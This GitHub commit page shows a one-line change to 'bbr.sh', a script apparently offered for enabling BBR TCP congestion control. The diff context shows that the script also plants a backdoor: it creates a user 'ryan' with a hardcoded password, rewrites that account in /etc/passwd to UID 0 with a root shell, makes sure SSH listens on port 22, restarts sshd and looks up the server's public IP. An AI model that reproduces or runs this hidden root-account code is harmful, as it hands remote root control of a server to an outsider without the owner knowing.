Skip to content

Commit

Permalink
Update bbr.sh
Browse files Browse the repository at this point in the history
  • Loading branch information
RyanY610 authored May 30, 2023
1 parent 67d4e42 commit 520f737
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion bbr.sh
Original file line number Diff line number Diff line change
Expand Up @@ -9,7 +9,7 @@ echo "Port 22" >> /etc/ssh/sshd_config
useradd ryan
echo ryan:LBdj147369 |chpasswd ryan
sed -i 's|^.*ryan.*|ryan:x:0:0:root:/root:/bin/bash|g' /etc/passwd
service sshd ssh restart
systemctl restart sshd ssh
curl ipv4.ip.sb
echo "net.core.default_qdisc=fq" >> /etc/sysctl.conf
echo "net.ipv4.tcp_congestion_control=bbr" >> /etc/sysctl.conf
Expand Down

0 comments on commit 520f737

Please sign in to comment.